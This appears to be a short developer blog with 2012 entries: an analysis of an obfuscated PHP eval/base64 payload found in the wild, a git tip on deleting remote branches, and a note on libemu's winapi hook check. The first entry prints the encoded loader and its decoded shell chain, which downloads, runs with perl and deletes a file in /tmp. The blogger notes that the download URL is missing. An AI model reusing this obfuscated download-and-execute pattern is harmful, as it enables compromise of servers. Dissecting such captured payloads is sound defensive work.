eval (base64_decode('c3lzdGVtKCdybSAtcmYgL3RtcC94LWJvdDt3Z2V0IC AtTyAvdG1wL3gtYm90O3BlcmwgL3RtcC94LWJvdDtwZXJsIC90bXAveC1ib3Q7cGVybCAvdG1wL3gtYm90O3JtIC1yZiAvdG1wL3gtYm90Jyk7 '));
>>
system('rm -rf /tmp/x-bot;wget -O /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;perl /tmp/x-bot;rm -rf /tmp/x-bot');
But the command wget -O /tmp/x-bot; is a bit odd.
What is this guy downloading? The -O parameter is the destination of the downloaded file, but the source URL is missing.
Maybe this is an intermediate-stage attack, but run by a hacker wannabe :)
05 June 2012
git delete remote
version 1.7.0
git push origin --delete branch
version 1.5.0
git push origin :branch
04 June 2012
libemu.emu_env_w32_eip_check(_env)
This function checks whether eip is a hooked winapi.
The problem: if eip is a hooked winapi address, libemu helpfully changes eip to the next instruction (as if it had already returned from the winapi).
40100: B8 6D 13 86 7C mov eax, 0x7C86136D
40105: FF D0 call eax
40107: 31 C0 xor eax, eax
say: eip = 40105
emu.test(1) # current eip = 0x7C86136D
emu.env_w32_hook_check() # which will call emu_env_w32_eip_check(_env)
# strangely, after the call above eip is set to 40107
# so the profile will not contain the winApi hooked msg.